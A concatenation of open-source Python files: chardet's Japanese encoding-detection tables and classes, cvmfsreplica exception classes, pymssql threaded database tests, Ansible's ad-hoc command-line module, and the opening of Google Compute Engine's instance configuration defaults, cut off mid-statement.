(0,1,0,4,0,0,0,0,0,1,4,0,4,1,4,2,4,0,3,0,1,0,1,0,0,0,0,0,2,0,3,1,1,1,0,3,0,0,0,1,2,1,0,0,1,1,1,1,0,1,0,0,0,1,0,0,3,0,0,0,0,3,2,0,2,2,0,1,0,0,0,2,3,2,3,3,0,0,0,0,2,1,0),
(0,5,1,5,0,3,0,3,0,5,4,4,5,1,5,3,3,0,4,3,4,3,5,3,4,3,3,2,4,3,4,3,3,0,3,3,1,4,4,3,4,4,4,3,4,5,5,3,2,3,1,1,3,3,1,3,1,1,3,3,2,4,5,3,3,5,0,4,0,3,0,4,4,3,5,3,3,0,3,4,0,4,3),
(0,5,0,5,0,3,0,2,0,4,4,3,5,2,4,3,3,3,4,4,4,3,5,3,5,3,3,1,4,0,4,3,3,0,3,3,0,4,4,4,4,5,4,3,3,5,5,3,2,3,1,2,3,2,0,1,0,0,3,2,2,4,4,3,1,5,0,4,0,3,0,4,3,1,3,2,1,0,3,3,0,3,3),
(0,4,0,5,0,5,0,4,0,4,5,5,5,3,4,3,3,2,5,4,4,3,5,3,5,3,4,0,4,3,4,4,3,2,4,4,3,4,5,4,4,5,5,0,3,5,5,4,1,3,3,2,3,3,1,3,1,0,4,3,1,4,4,3,4,5,0,4,0,2,0,4,3,4,4,3,3,0,4,0,0,5,5),
(0,4,0,4,0,5,0,1,1,3,3,4,4,3,4,1,3,0,5,1,3,0,3,1,3,1,1,0,3,0,3,3,4,0,4,3,0,4,4,4,3,4,4,0,3,5,4,1,0,3,0,0,2,3,0,3,1,0,3,1,0,3,2,1,3,5,0,3,0,1,0,3,2,3,3,4,4,0,2,2,0,4,4),
(2,4,0,5,0,4,0,3,0,4,5,5,4,3,5,3,5,3,5,3,5,2,5,3,4,3,3,4,3,4,5,3,2,1,5,4,3,2,3,4,5,3,4,1,2,5,4,3,0,3,3,0,3,2,0,2,3,0,4,1,0,3,4,3,3,5,0,3,0,1,0,4,5,5,5,4,3,0,4,2,0,3,5),
(0,5,0,4,0,4,0,2,0,5,4,3,4,3,4,3,3,3,4,3,4,2,5,3,5,3,4,1,4,3,4,4,4,0,3,5,0,4,4,4,4,5,3,1,3,4,5,3,3,3,3,3,3,3,0,2,2,0,3,3,2,4,3,3,3,5,3,4,1,3,3,5,3,2,0,0,0,0,4,3,1,3,3),
(0,1,0,3,0,3,0,1,0,1,3,3,3,2,3,3,3,0,3,0,0,0,3,1,3,0,0,0,2,2,2,3,0,0,3,2,0,1,2,4,1,3,3,0,0,3,3,3,0,1,0,0,2,1,0,0,3,0,3,1,0,3,0,0,1,3,0,2,0,1,0,3,3,1,3,3,0,0,1,1,0,3,3),
(0,2,0,3,0,2,1,4,0,2,2,3,1,1,3,1,1,0,2,0,3,1,2,3,1,3,0,0,1,0,4,3,2,3,3,3,1,4,2,3,3,3,3,1,0,3,1,4,0,1,1,0,1,2,0,1,1,0,1,1,0,3,1,3,2,2,0,1,0,0,0,2,3,3,3,1,0,0,0,0,0,2,3),
(0,5,0,4,0,5,0,2,0,4,5,5,3,3,4,3,3,1,5,4,4,2,4,4,4,3,4,2,4,3,5,5,4,3,3,4,3,3,5,5,4,5,5,1,3,4,5,3,1,4,3,1,3,3,0,3,3,1,4,3,1,4,5,3,3,5,0,4,0,3,0,5,3,3,1,4,3,0,4,0,1,5,3),
(0,5,0,5,0,4,0,2,0,4,4,3,4,3,3,3,3,3,5,4,4,4,4,4,4,5,3,3,5,2,4,4,4,3,4,4,3,3,4,4,5,5,3,3,4,3,4,3,3,4,3,3,3,3,1,2,2,1,4,3,3,5,4,4,3,4,0,4,0,3,0,4,4,4,4,4,1,0,4,2,0,2,4),
(0,4,0,4,0,3,0,1,0,3,5,2,3,0,3,0,2,1,4,2,3,3,4,1,4,3,3,2,4,1,3,3,3,0,3,3,0,0,3,3,3,5,3,3,3,3,3,2,0,2,0,0,2,0,0,2,0,0,1,0,0,3,1,2,2,3,0,3,0,2,0,4,4,3,3,4,1,0,3,0,0,2,4),
(0,0,0,4,0,0,0,0,0,0,1,0,1,0,2,0,0,0,0,0,1,0,2,0,1,0,0,0,0,0,3,1,3,0,3,2,0,0,0,1,0,3,2,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,3,4,0,2,0,0,0,0,0,0,2),
(0,2,1,3,0,2,0,2,0,3,3,3,3,1,3,1,3,3,3,3,3,3,4,2,2,1,2,1,4,0,4,3,1,3,3,3,2,4,3,5,4,3,3,3,3,3,3,3,0,1,3,0,2,0,0,1,0,0,1,0,0,4,2,0,2,3,0,3,3,0,3,3,4,2,3,1,4,0,1,2,0,2,3),
(0,3,0,3,0,1,0,3,0,2,3,3,3,0,3,1,2,0,3,3,2,3,3,2,3,2,3,1,3,0,4,3,2,0,3,3,1,4,3,3,2,3,4,3,1,3,3,1,1,0,1,1,0,1,0,1,0,1,0,0,0,4,1,1,0,3,0,3,1,0,2,3,3,3,3,3,1,0,0,2,0,3,3),
(0,0,0,0,0,0,0,0,0,0,3,0,2,0,3,0,0,0,0,0,0,0,3,0,0,0,0,0,0,0,3,0,3,0,3,1,0,1,0,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,3,0,2,0,2,3,0,0,0,0,0,0,0,0,3),
(0,2,0,3,1,3,0,3,0,2,3,3,3,1,3,1,3,1,3,1,3,3,3,1,3,0,2,3,1,1,4,3,3,2,3,3,1,2,2,4,1,3,3,0,1,4,2,3,0,1,3,0,3,0,0,1,3,0,2,0,0,3,3,2,1,3,0,3,0,2,0,3,4,4,4,3,1,0,3,0,0,3,3),
(0,2,0,1,0,2,0,0,0,1,3,2,2,1,3,0,1,1,3,0,3,2,3,1,2,0,2,0,1,1,3,3,3,0,3,3,1,1,2,3,2,3,3,1,2,3,2,0,0,1,0,0,0,0,0,0,3,0,1,0,0,2,1,2,1,3,0,3,0,0,0,3,4,4,4,3,2,0,2,0,0,2,4),
(0,0,0,1,0,1,0,0,0,0,1,0,0,0,1,0,0,0,0,0,0,0,1,1,1,0,0,0,0,0,0,0,0,0,2,2,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,1,3,1,0,0,0,0,0,0,0,3),
(0,3,0,3,0,2,0,3,0,3,3,3,2,3,2,2,2,0,3,1,3,3,3,2,3,3,0,0,3,0,3,2,2,0,2,3,1,4,3,4,3,3,2,3,1,5,4,4,0,3,1,2,1,3,0,3,1,1,2,0,2,3,1,3,1,3,0,3,0,1,0,3,3,4,4,2,1,0,2,1,0,2,4),
(0,1,0,3,0,1,0,2,0,1,4,2,5,1,4,0,2,0,2,1,3,1,4,0,2,1,0,0,2,1,4,1,1,0,3,3,0,5,1,3,2,3,3,1,0,3,2,3,0,1,0,0,0,0,0,0,1,0,0,0,0,4,0,1,0,3,0,2,0,1,0,3,3,3,4,3,3,0,0,0,0,2,3),
(0,0,0,1,0,0,0,0,0,0,2,0,1,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,3,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,1,0,0,1,0,0,0,0,0,3),
(0,1,0,3,0,4,0,3,0,2,4,3,1,0,3,2,2,1,3,1,2,2,3,1,1,1,2,1,3,0,1,2,0,1,3,2,1,3,0,5,5,1,0,0,1,3,2,1,0,3,0,0,1,0,0,0,0,0,3,4,0,1,1,1,3,2,0,2,0,1,0,2,3,3,1,2,3,0,1,0,1,0,4),
(0,0,0,1,0,3,0,3,0,2,2,1,0,0,4,0,3,0,3,1,3,0,3,0,3,0,1,0,3,0,3,1,3,0,3,3,0,0,1,2,1,1,1,0,1,2,0,0,0,1,0,0,1,0,0,0,0,0,0,0,0,2,2,1,2,0,0,2,0,0,0,0,2,3,3,3,3,0,0,0,0,1,4),
(0,0,0,3,0,3,0,0,0,0,3,1,1,0,3,0,1,0,2,0,1,0,0,0,0,0,0,0,1,0,3,0,2,0,2,3,0,0,2,2,3,1,2,0,0,1,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,3,0,0,2,0,0,0,0,2,3),
(2,4,0,5,0,5,0,4,0,3,4,3,3,3,4,3,3,3,4,3,4,4,5,4,5,5,5,2,3,0,5,5,4,1,5,4,3,1,5,4,3,4,4,3,3,4,3,3,0,3,2,0,2,3,0,3,0,0,3,3,0,5,3,2,3,3,0,3,0,3,0,3,4,5,4,5,3,0,4,3,0,3,4),
(0,3,0,3,0,3,0,3,0,3,3,4,3,2,3,2,3,0,4,3,3,3,3,3,3,3,3,0,3,2,4,3,3,1,3,4,3,4,4,4,3,4,4,3,2,4,4,1,0,2,0,0,1,1,0,2,0,0,3,1,0,5,3,2,1,3,0,3,0,1,2,4,3,2,4,3,3,0,3,2,0,4,4),
(0,3,0,3,0,1,0,0,0,1,4,3,3,2,3,1,3,1,4,2,3,2,4,2,3,4,3,0,2,2,3,3,3,0,3,3,3,0,3,4,1,3,3,0,3,4,3,3,0,1,1,0,1,0,0,0,4,0,3,0,0,3,1,2,1,3,0,4,0,1,0,4,3,3,4,3,3,0,2,0,0,3,3),
(0,3,0,4,0,1,0,3,0,3,4,3,3,0,3,3,3,1,3,1,3,3,4,3,3,3,0,0,3,1,5,3,3,1,3,3,2,5,4,3,3,4,5,3,2,5,3,4,0,1,0,0,0,0,0,2,0,0,1,1,0,4,2,2,1,3,0,3,0,2,0,4,4,3,5,3,2,0,1,1,0,3,4),
(0,5,0,4,0,5,0,2,0,4,4,3,3,2,3,3,3,1,4,3,4,1,5,3,4,3,4,0,4,2,4,3,4,1,5,4,0,4,4,4,4,5,4,1,3,5,4,2,1,4,1,1,3,2,0,3,1,0,3,2,1,4,3,3,3,4,0,4,0,3,0,4,4,4,3,3,3,0,4,2,0,3,4),
(1,4,0,4,0,3,0,1,0,3,3,3,1,1,3,3,2,2,3,3,1,0,3,2,2,1,2,0,3,1,2,1,2,0,3,2,0,2,2,3,3,4,3,0,3,3,1,2,0,1,1,3,1,2,0,0,3,0,1,1,0,3,2,2,3,3,0,3,0,0,0,2,3,3,4,3,3,0,1,0,0,1,4),
(0,4,0,4,0,4,0,0,0,3,4,4,3,1,4,2,3,2,3,3,3,1,4,3,4,0,3,0,4,2,3,3,2,2,5,4,2,1,3,4,3,4,3,1,3,3,4,2,0,2,1,0,3,3,0,0,2,0,3,1,0,4,4,3,4,3,0,4,0,1,0,2,4,4,4,4,4,0,3,2,0,3,3),
(0,0,0,1,0,4,0,0,0,0,0,0,1,1,1,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,1,0,3,2,0,0,1,0,0,0,1,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,2),
(0,2,0,3,0,4,0,4,0,1,3,3,3,0,4,0,2,1,2,1,1,1,2,0,3,1,1,0,1,0,3,1,0,0,3,3,2,0,1,1,0,0,0,0,0,1,0,2,0,2,2,0,3,1,0,0,1,0,1,1,0,1,2,0,3,0,0,0,0,1,0,0,3,3,4,3,1,0,1,0,3,0,2),
(0,0,0,3,0,5,0,0,0,0,1,0,2,0,3,1,0,1,3,0,0,0,2,0,0,0,1,0,0,0,1,1,0,0,4,0,0,0,2,3,0,1,4,1,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,3,0,0,0,0,0,1,0,0,0,0,0,0,0,2,0,0,3,0,0,0,0,0,3),
(0,2,0,5,0,5,0,1,0,2,4,3,3,2,5,1,3,2,3,3,3,0,4,1,2,0,3,0,4,0,2,2,1,1,5,3,0,0,1,4,2,3,2,0,3,3,3,2,0,2,4,1,1,2,0,1,1,0,3,1,0,1,3,1,2,3,0,2,0,0,0,1,3,5,4,4,4,0,3,0,0,1,3),
(0,4,0,5,0,4,0,4,0,4,5,4,3,3,4,3,3,3,4,3,4,4,5,3,4,5,4,2,4,2,3,4,3,1,4,4,1,3,5,4,4,5,5,4,4,5,5,5,2,3,3,1,4,3,1,3,3,0,3,3,1,4,3,4,4,4,0,3,0,4,0,3,3,4,4,5,0,0,4,3,0,4,5),
(0,4,0,4,0,3,0,3,0,3,4,4,4,3,3,2,4,3,4,3,4,3,5,3,4,3,2,1,4,2,4,4,3,1,3,4,2,4,5,5,3,4,5,4,1,5,4,3,0,3,2,2,3,2,1,3,1,0,3,3,3,5,3,3,3,5,4,4,2,3,3,4,3,3,3,2,1,0,3,2,1,4,3),
(0,4,0,5,0,4,0,3,0,3,5,5,3,2,4,3,4,0,5,4,4,1,4,4,4,3,3,3,4,3,5,5,2,3,3,4,1,2,5,5,3,5,5,2,3,5,5,4,0,3,2,0,3,3,1,1,5,1,4,1,0,4,3,2,3,5,0,4,0,3,0,5,4,3,4,3,0,0,4,1,0,4,4),
(1,3,0,4,0,2,0,2,0,2,5,5,3,3,3,3,3,0,4,2,3,4,4,4,3,4,0,0,3,4,5,4,3,3,3,3,2,5,5,4,5,5,5,4,3,5,5,5,1,3,1,0,1,0,0,3,2,0,4,2,0,5,2,3,2,4,1,3,0,3,0,4,5,4,5,4,3,0,4,2,0,5,4),
(0,3,0,4,0,5,0,3,0,3,4,4,3,2,3,2,3,3,3,3,3,2,4,3,3,2,2,0,3,3,3,3,3,1,3,3,3,0,4,4,3,4,4,1,1,4,4,2,0,3,1,0,1,1,0,4,1,0,2,3,1,3,3,1,3,4,0,3,0,1,0,3,1,3,0,0,1,0,2,0,0,4,4),
(0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0),
(0,3,0,3,0,2,0,3,0,1,5,4,3,3,3,1,4,2,1,2,3,4,4,2,4,4,5,0,3,1,4,3,4,0,4,3,3,3,2,3,2,5,3,4,3,2,2,3,0,0,3,0,2,1,0,1,2,0,0,0,0,2,1,1,3,1,0,2,0,4,0,3,4,4,4,5,2,0,2,0,0,1,3),
(0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,1,1,1,0,0,1,1,0,0,0,4,2,1,1,0,1,0,3,2,0,0,3,1,1,1,2,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,3,0,1,0,0,0,2,0,0,0,1,4,0,4,2,1,0,0,0,0,0,1),
(0,0,0,0,0,0,0,0,0,1,0,1,0,0,0,0,1,0,0,0,0,0,0,1,0,1,0,0,0,0,3,1,0,0,0,2,0,2,1,0,0,1,2,1,0,1,1,0,0,3,0,0,0,0,0,0,0,0,0,0,0,1,3,1,0,0,0,0,0,1,0,0,2,1,0,0,0,0,0,0,0,0,2),
(0,4,0,4,0,4,0,3,0,4,4,3,4,2,4,3,2,0,4,4,4,3,5,3,5,3,3,2,4,2,4,3,4,3,1,4,0,2,3,4,4,4,3,3,3,4,4,4,3,4,1,3,4,3,2,1,2,1,3,3,3,4,4,3,3,5,0,4,0,3,0,4,3,3,3,2,1,0,3,0,0,3,3),
(0,4,0,3,0,3,0,3,0,3,5,5,3,3,3,3,4,3,4,3,3,3,4,4,4,3,3,3,3,4,3,5,3,3,1,3,2,4,5,5,5,5,4,3,4,5,5,3,2,2,3,3,3,3,2,3,3,1,2,3,2,4,3,3,3,4,0,4,0,2,0,4,3,2,2,1,2,0,3,0,0,4,1),
)
class JapaneseContextAnalysis(object):
NUM_OF_CATEGORY = 6
DONT_KNOW = -1
ENOUGH_REL_THRESHOLD = 100
MAX_REL_THRESHOLD = 1000
MINIMUM_DATA_THRESHOLD = 4
def __init__(self):
self._total_rel = None
self._rel_sample = None
self._need_to_skip_char_num = None
self._last_char_order = None
self._done = None
self.reset()
def reset(self):
self._total_rel = 0 # total sequence received
# category counters, each integer counts sequence in its category
self._rel_sample = [0] * self.NUM_OF_CATEGORY
# if last byte in current buffer is not the last byte of a character,
# we need to know how many bytes to skip in next buffer
self._need_to_skip_char_num = 0
self._last_char_order = -1 # The order of previous char
# If this flag is set to True, detection is done and conclusion has
# been made
self._done = False
def feed(self, byte_str, num_bytes):
if self._done:
return
# The buffer we got is byte oriented, and a character may span in more than one
# buffers. In case the last one or two byte in last buffer is not
# complete, we record how many byte needed to complete that character
# and skip these bytes here. We can choose to record those bytes as
# well and analyse the character once it is complete, but since a
# character will not make much difference, by simply skipping
# this character will simply our logic and improve performance.
i = self._need_to_skip_char_num
while i < num_bytes:
order, char_len = self.get_order(byte_str[i:i + 2])
i += char_len
if i > num_bytes:
self._need_to_skip_char_num = i - num_bytes
self._last_char_order = -1
else:
if (order != -1) and (self._last_char_order != -1):
self._total_rel += 1
if self._total_rel > self.MAX_REL_THRESHOLD:
self._done = True
break
self._rel_sample[jp2CharContext[self._last_char_order][order]] += 1
self._last_char_order = order
def got_enough_data(self):
return self._total_rel > self.ENOUGH_REL_THRESHOLD
def get_confidence(self):
# This is just one way to calculate confidence. It works well for me.
if self._total_rel > self.MINIMUM_DATA_THRESHOLD:
return (self._total_rel - self._rel_sample[0]) / self._total_rel
else:
return self.DONT_KNOW
def get_order(self, byte_str):
return -1, 1
class SJISContextAnalysis(JapaneseContextAnalysis):
def __init__(self):
super(SJISContextAnalysis, self).__init__()
self._charset_name = "SHIFT_JIS"
@property
def charset_name(self):
return self._charset_name
def get_order(self, byte_str):
if not byte_str:
return -1, 1
# find out current char's byte length
first_char = byte_str[0]
if (0x81 <= first_char <= 0x9F) or (0xE0 <= first_char <= 0xFC):
char_len = 2
if (first_char == 0x87) or (0xFA <= first_char <= 0xFC):
self._charset_name = "CP932"
else:
char_len = 1
# return its order if it is hiragana
if len(byte_str) > 1:
second_char = byte_str[1]
if (first_char == 202) and (0x9F <= second_char <= 0xF1):
return second_char - 0x9F, char_len
return -1, char_len
class EUCJPContextAnalysis(JapaneseContextAnalysis):
def get_order(self, byte_str):
if not byte_str:
return -1, 1
# find out current char's byte length
first_char = byte_str[0]
if (first_char == 0x8E) or (0xA1 <= first_char <= 0xFE):
char_len = 2
elif first_char == 0x8F:
char_len = 3
else:
char_len = 1
# return its order if it is hiragana
if len(byte_str) > 1:
second_char = byte_str[1]
if (first_char == 0xA4) and (0xA1 <= second_char <= 0xF3):
return second_char - 0xA1, char_len
return -1, char_len
| apache-2.0 |
jose-caballero/cvmfsreplica | cvmfsreplica/cvmfsreplicaex.py | 1 | 1122 | #! /usr/bin/env python
#
# exception classes for cvmfsreplica project
class ServiceConfigurationFailure(Exception):
"""
Exception to be raised when basic service configuration
cannot be read
"""
def __init__(self, value):
self.value = value
def __str__(self):
return repr(self.value)
class RepositoriesConfigurationFailure(Exception):
"""
Exception to be raised when basic repositories configuration
cannot be read
"""
def __init__(self, value):
self.value = value
def __str__(self):
return repr(self.value)
class PluginConfigurationFailure(Exception):
"""
Exception to be raised when a plugin configuration
cannot be read
"""
def __init__(self, value):
self.value = value
def __str__(self):
return repr(self.value)
class AcceptancePluginFailed(Exception):
"""
Exception to be raised when an Acceptance Plugin
failed and it has an attribute should_abort = True
"""
def __init__(self, value):
self.value = value
def __str__(self):
return repr(self.value)
| gpl-3.0 |
klothe/pymssql | tests/test_threaded.py | 6 | 3066 | import sys
import threading
import time
import unittest
from _mssql import MSSQLDatabaseException
from .helpers import mssqlconn, StoredProc, mark_slow
error_sproc = StoredProc(
"pymssqlErrorThreadTest",
args=(),
body="SELECT unknown_column FROM unknown_table")
class _TestingThread(threading.Thread):
def __init__(self):
super(_TestingThread, self).__init__()
self.results = []
self.exc = None
def run(self):
try:
with mssqlconn() as mssql:
for i in range(0, 1000):
num = mssql.execute_scalar('SELECT %d', (i,))
assert num == i
self.results.append(num)
except Exception as exc:
self.exc = exc
class _TestingErrorThread(_TestingThread):
def run(self):
try:
with mssqlconn() as mssql:
mssql.execute_query('SELECT unknown_column')
except Exception as exc:
self.exc = exc
class _SprocTestingErrorThread(_TestingThread):
def run(self):
try:
with mssqlconn() as mssql:
error_sproc.execute(mssql=mssql)
except Exception as exc:
self.exc = exc
class ThreadedTests(unittest.TestCase):
def run_threads(self, num, thread_class):
threads = [thread_class() for _ in range(num)]
for thread in threads:
thread.start()
results = []
exceptions = []
while len(threads) > 0:
sys.stdout.write(".")
sys.stdout.flush()
for thread in threads:
if not thread.is_alive():
threads.remove(thread)
if thread.results:
results.append(thread.results)
if thread.exc:
exceptions.append(thread.exc)
time.sleep(5)
sys.stdout.write(" ")
sys.stdout.flush()
return results, exceptions
@mark_slow
def testThreadedUse(self):
results, exceptions = self.run_threads(
num=50,
thread_class=_TestingThread)
self.assertEqual(len(exceptions), 0)
for result in results:
self.assertEqual(result, list(range(0, 1000)))
@mark_slow
def testErrorThreadedUse(self):
results, exceptions = self.run_threads(
num=2,
thread_class=_TestingErrorThread)
self.assertEqual(len(exceptions), 2)
for exc in exceptions:
self.assertEqual(type(exc), MSSQLDatabaseException)
@mark_slow
def testErrorSprocThreadedUse(self):
with error_sproc.create():
results, exceptions = self.run_threads(
num=5,
thread_class=_SprocTestingErrorThread)
self.assertEqual(len(exceptions), 5)
for exc in exceptions:
self.assertEqual(type(exc), MSSQLDatabaseException)
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(ThreadedTests))
if __name__ == '__main__':
unittest.main()
| lgpl-2.1 |
Cryptophobia/ansible | lib/ansible/cli/adhoc.py | 5 | 7095 | # (c) 2012, Michael DeHaan <michael.dehaan@gmail.com>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
########################################################
import os
from ansible import constants as C
from ansible.cli import CLI
from ansible.errors import AnsibleError, AnsibleOptionsError
from ansible.executor.task_queue_manager import TaskQueueManager
from ansible.inventory import Inventory
from ansible.parsing.dataloader import DataLoader
from ansible.parsing.splitter import parse_kv
from ansible.playbook.play import Play
from ansible.plugins import get_all_plugin_loaders
from ansible.utils.vars import load_extra_vars
from ansible.utils.unicode import to_unicode
from ansible.vars import VariableManager
try:
from __main__ import display
except ImportError:
from ansible.utils.display import Display
display = Display()
########################################################
class AdHocCLI(CLI):
''' code behind ansible ad-hoc cli'''
def parse(self):
''' create an options parser for bin/ansible '''
self.parser = CLI.base_parser(
usage='%prog <host-pattern> [options]',
runas_opts=True,
inventory_opts=True,
async_opts=True,
output_opts=True,
connect_opts=True,
check_opts=True,
runtask_opts=True,
vault_opts=True,
fork_opts=True,
module_opts=True,
)
# options unique to ansible ad-hoc
self.parser.add_option('-a', '--args', dest='module_args',
help="module arguments", default=C.DEFAULT_MODULE_ARGS)
self.parser.add_option('-m', '--module-name', dest='module_name',
help="module name to execute (default=%s)" % C.DEFAULT_MODULE_NAME,
default=C.DEFAULT_MODULE_NAME)
self.options, self.args = self.parser.parse_args(self.args[1:])
if len(self.args) != 1:
raise AnsibleOptionsError("Missing target hosts")
display.verbosity = self.options.verbosity
self.validate_conflicts(runas_opts=True, vault_opts=True, fork_opts=True)
return True
def _play_ds(self, pattern, async, poll):
check_raw = self.options.module_name in ('command', 'shell', 'script', 'raw')
return dict(
name = "Ansible Ad-Hoc",
hosts = pattern,
gather_facts = 'no',
tasks = [ dict(action=dict(module=self.options.module_name, args=parse_kv(self.options.module_args, check_raw=check_raw)), async=async, poll=poll) ]
)
def run(self):
''' use Runner lib to do SSH things '''
super(AdHocCLI, self).run()
# only thing left should be host pattern
pattern = to_unicode(self.args[0], errors='strict')
# ignore connection password cause we are local
if self.options.connection == "local":
self.options.ask_pass = False
sshpass = None
becomepass = None
vault_pass = None
self.normalize_become_options()
(sshpass, becomepass) = self.ask_passwords()
passwords = { 'conn_pass': sshpass, 'become_pass': becomepass }
loader = DataLoader()
if self.options.vault_password_file:
# read vault_pass from a file
vault_pass = CLI.read_vault_password_file(self.options.vault_password_file, loader=loader)
loader.set_vault_password(vault_pass)
elif self.options.ask_vault_pass:
vault_pass = self.ask_vault_passwords()[0]
loader.set_vault_password(vault_pass)
variable_manager = VariableManager()
variable_manager.extra_vars = load_extra_vars(loader=loader, options=self.options)
inventory = Inventory(loader=loader, variable_manager=variable_manager, host_list=self.options.inventory)
variable_manager.set_inventory(inventory)
no_hosts = False
if len(inventory.list_hosts(pattern)) == 0:
# Empty inventory
display.warning("provided hosts list is empty, only localhost is available")
no_hosts = True
inventory.subset(self.options.subset)
hosts = inventory.list_hosts(pattern)
if len(hosts) == 0 and no_hosts is False:
# Invalid limit
raise AnsibleError("Specified --limit does not match any hosts")
if self.options.listhosts:
display.display(' hosts (%d):' % len(hosts))
for host in hosts:
display.display(' %s' % host)
return 0
if self.options.module_name in C.MODULE_REQUIRE_ARGS and not self.options.module_args:
err = "No argument passed to %s module" % self.options.module_name
if pattern.endswith(".yml"):
err = err + ' (did you mean to run ansible-playbook?)'
raise AnsibleOptionsError(err)
# dynamically load any plugins from the playbook directory
for name, obj in get_all_plugin_loaders():
if obj.subdir:
plugin_path = os.path.join('.', obj.subdir)
if os.path.isdir(plugin_path):
obj.add_directory(plugin_path)
play_ds = self._play_ds(pattern, self.options.seconds, self.options.poll_interval)
play = Play().load(play_ds, variable_manager=variable_manager, loader=loader)
if self.callback:
cb = self.callback
elif self.options.one_line:
cb = 'oneline'
else:
cb = 'minimal'
run_tree=False
if self.options.tree:
C.DEFAULT_CALLBACK_WHITELIST.append('tree')
C.TREE_DIR = self.options.tree
run_tree=True
# now create a task queue manager to execute the play
self._tqm = None
try:
self._tqm = TaskQueueManager(
inventory=inventory,
variable_manager=variable_manager,
loader=loader,
options=self.options,
passwords=passwords,
stdout_callback=cb,
run_additional_callbacks=C.DEFAULT_LOAD_CALLBACK_PLUGINS,
run_tree=run_tree,
)
result = self._tqm.run(play)
finally:
if self._tqm:
self._tqm.cleanup()
return result
| gpl-3.0 |
wrigri/compute-image-packages | packages/python-google-compute-engine/google_compute_engine/instance_setup/instance_config.py | 6 | 6415 | #!/usr/bin/python
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""A library used to set up the instance's default configurations file.
Note that the configurations in
/etc/default/instance_configs.cfg.template override the values set in
/etc/default/instance_configs.cfg. The system instance_configs.cfg may be
overridden during package upgrade.
"""
import logging
import os
from google_compute_engine import config_manager
from google_compute_engine import constants
from google_compute_engine.compat import parser
from google_compute_engine.compat import stringio
class InstanceConfig(config_manager.ConfigManager):
"""Creates a defaults config file for instance configuration."""
instance_config = constants.SYSCONFDIR + '/instance_configs.cfg'
instance_config_distro = '%s.distro' % instance_config
instance_config_template = '%s.template' % instance_config
instance_config_script = os.path.abspath(__file__)
instance_config_header = (
'This file is automatically created at boot time by the %s script. Do '
'not edit this file directly. If you need to add items to this file, '
'create or edit %s instead and then run '
'/usr/bin/google_instance_setup.')
instance_config_options = {
'Accounts': {
'deprovision_remove': 'false',
'groups': 'adm,dip,docker,lxd,plugdev,video',
# The encrypted password is set to '*' for SSH on Linux systems
# without PAM.
#
# SSH uses '!' as its locked account token:
# https://github.com/openssh/openssh-portable/blob/master/configure.ac
#
# When the token is specified, SSH denies login:
# https://github.com/openssh/openssh-portable/blob/master/auth.c
#
# To solve the issue, make the password '*' which is also recognized
# as locked but does not prevent SSH login.
'gpasswd_add_cmd': 'gpasswd -a {user} {group}',
'gpasswd_remove_cmd': 'gpasswd -d {user} {group}',
'groupadd_cmd': 'groupadd {group}',
'useradd_cmd': 'useradd -m -s /bin/bash -p * {user}',
'userdel_cmd': 'userdel -r {user}',
'usermod_cmd': 'usermod -G {groups} {user}',
},
'Daemons': {
'accounts_daemon': 'true',
'clock_skew_daemon': 'true',
'ip_forwarding_daemon': 'true', # Deprecated.
'network_daemon': 'true',
},
'Instance': {
'instance_id': '0',
},
'InstanceSetup': {
'host_key_types': 'ecdsa,ed25519,rsa',
'optimize_local_ssd': 'true',
'network_enabled': 'true',
# WARNING: Do not change the value of 'set_boto_config' without first
# consulting the gsutil team (GoogleCloudPlatform/gsutil).
'set_boto_config': 'true',
'set_host_keys': 'true',
'set_multiqueue': 'true',
},
'IpForwarding': {
'ethernet_proto_id': '66',
'ip_aliases': 'true',
'target_instance_ips': 'true',
},
'MetadataScripts': {
'run_dir': '',
'startup': 'true',
'shutdown': 'true',
'default_shell': '/bin/bash',
},
'NetworkInterfaces': {
'setup': 'true',
'ip_forwarding': 'true',
'dhcp_command': '',
'dhclient_script': '/sbin/google-dhclient-script',
},
}
def __init__(self, logger=logging, instance_config_metadata=None):
"""Constructor.
Inherit from the ConfigManager class. Read the template for instance
defaults and write new sections and options. This prevents package
updates from overriding user set defaults.
Args:
logger: logger object, used to write to SysLog and serial port.
instance_config_metadata: string, a config file specified in metadata.
"""
self.logger = logger
self.instance_config_metadata = instance_config_metadata
self.instance_config_header %= (
